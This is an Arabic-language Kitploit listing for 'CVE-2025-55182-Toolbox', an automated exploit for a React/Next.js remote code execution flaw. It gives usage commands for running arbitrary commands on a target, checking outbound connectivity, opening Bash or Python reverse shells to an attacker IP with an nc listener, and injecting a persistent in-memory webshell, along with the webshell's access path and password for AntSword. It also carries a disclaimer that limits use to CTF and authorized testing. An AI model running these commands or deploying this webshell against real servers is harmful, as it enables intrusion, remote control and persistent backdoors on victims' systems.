Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-55182-Toolbox — أداة استغلال آلية لثغرة CVE-2025-55182 (تنفيذ الأكواد عن بُعد في React/Next.js) مع تنفيذ الأوامر، وكشف الاتصالات الصادرة، وقشرة عكسية تفاعلية، وحقن ويب شيل دائم في الذاكرة للاختبارات الاختراقية المصرح بها وتحديات CTF. | Kitploit
أدوات/GitHubGitHub/lamaper/cve-2025-55182-toolbox
آليات الاستمراريةالاستغلالاستغلال تطبيقات الويبما بعد الاستغلالCTFاختبار الاختراقالقيادة والسيطرةالفريق الأحمرتطوير الحمولات

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
GitHublamaper/cve-2025-55182-toolbox

CVE-2025-55182-Toolbox

أداة استغلال آلية لثغرة CVE-2025-55182 (تنفيذ الأكواد عن بُعد في React/Next.js) مع تنفيذ الأوامر، وكشف الاتصالات الصادرة، وقشرة عكسية تفاعلية، وحقن ويب شيل دائم في الذاكرة للاختبارات الاختراقية المصرح بها وتحديات CTF.

عرض المستودع
14منذ 8 أشهرلم تتم المراجعة بعد
مشاركة

React2Shell: CVE-2025-55182 أداة استغلال شاملة

المؤلف: lamaper / BITs2Sys

الإصدار: 1.0.1

الترخيص: MIT

📝 نبذة عن الأداة

هذه الأداة هي أداة اختبار اختراق آلية مصممة خصيصًا لثغرة CVE-2025-55182 (تلوث سلسلة النماذج الأولية في React Server Components / Next.js المؤدي إلى RCE). صُممت الأداة خصيصًا لمسابقات CTF ومشاريع الخدمات الأمنية المصرح بها، وتجمع بين عدة وظائف مثل التحقق من الثغرات، وفحص الاتصال بالشبكة الخارجية، وإنشاء قشرة عكسية، وحقن الحصان المقيم في الذاكرة.

🚀 الوظائف الأساسية

  • تنفيذ الأوامر بضغطة واحدة (--cmd): يستخدم آلية الاستثناء NEXT_REDIRECT لإرجاع نتائج تنفيذ الأوامر المشفرة بـ Base64 بدقة.
  • فحص حالة الاتصال بالشبكة الخارجية (--check-outbound): يختبر تلقائيًا قدرة الهدف على الوصول إلى DNS وHTTP وICMP، مما يساعد في تحديد مسار الهجوم.
  • قشرة عكسية تفاعلية (--shell): تتضمن وضعي القشرة العكسية Bash وPython3، وتدعم التنفيذ غير المتزامن لمنع تعليق طلبات HTTP.
  • حصان مقيم دائم في الذاكرة (--inject-ms): يقوم بحقن حصان مقيم في الذاكرة عبر اختطاف آلية توزيع الأحداث في http.Server الخاص بـ Node.js، دون ترك أي ملفات على القرص، ويدعم التحكم المستمر.
  • واجهة تفاعل الحصان المقيم (--ms-cmd): وضع تفاعل مستقل عن مسار استغلال الثغرة، يمكنك من تنفيذ الأوامر مباشرة عبر الباب الخلفي بعد نجاح الحقن.
  • 🛠️ التثبيت والاعتماديات

    هذه الأداة مبنية على Python 3، وتتطلب فقط تثبيت مكتبة requests.

    root@kitploit:~
    pip install requests
    

    📖 دليل الاستخدام

    0. التحقق من وجود الثغرة

    https://github.com/assetnote/react2shell-scanner هو أداة فحص مفيدة جدًا

    1. تنفيذ الأوامر الأساسية

    احصل على معلومات الهدف مباشرة:

    root@kitploit:~
    python exploit.py --url http://target.com/ --cmd "id"
    python exploit.py --url http://target.com/ --cmd "cat /flag"
    

    2. فحص الاتصال بالشبكة الخارجية

    قبل محاولة إنشاء قشرة عكسية، تأكد من قدرة الهدف على الاتصال بالإنترنت الخارجي:

    root@kitploit:~
    python exploit.py --url http://target.com/ --check-outbound
    

    3. القشرة العكسية

    وضع Bash:

    root@kitploit:~
    # 攻击机执行监听: nc -lvnp 4444
    python exploit.py --url http://target.com/ --shell bash --ip <你的IP> --port 4444
    

    وضع Python:

    root@kitploit:~
    python exploit.py --url http://target.com/ --shell python --ip <你的IP> --port 4444
    

    4. استغلال الحصان المقيم في الذاكرة (الاستمرارية)

    حقن الحصان المقيم في الذاكرة:

    root@kitploit:~
    python exploit.py --url http://target.com/ --inject-ms
    

    تنفيذ الأوامر عبر الحصان المقيم (يُستخدم بعد نجاح الحقن):

    root@kitploit:~
    python exploit.py --url http://target.com/ --ms-cmd "whoami"
    

    ملاحظة: المسار الافتراضي لتركيب الحصان المقيم هو /?pass، ويتم التشغيل بإرسال المعامل pwd عبر POST.

    الاتصال عبر أداة AntSword:

    كلمة مرور الاتصال: pwd، طريقة الاتصال: CMDLINUX

    ⚠️ إخلاء المسؤولية

    تُستخدم هذه الأداة فقط في النطاق المسموح به قانونًا لأغراض البحث الأمني ومسابقات CTF واختبارات الاختراق المصرح بها. يُحظر تمامًا استخدامها في الهجمات غير القانونية. يتحمل المستخدم كامل المسؤولية عن أي عواقب تنجم عن استخدام هذه الأداة.


    تنزيل الأداة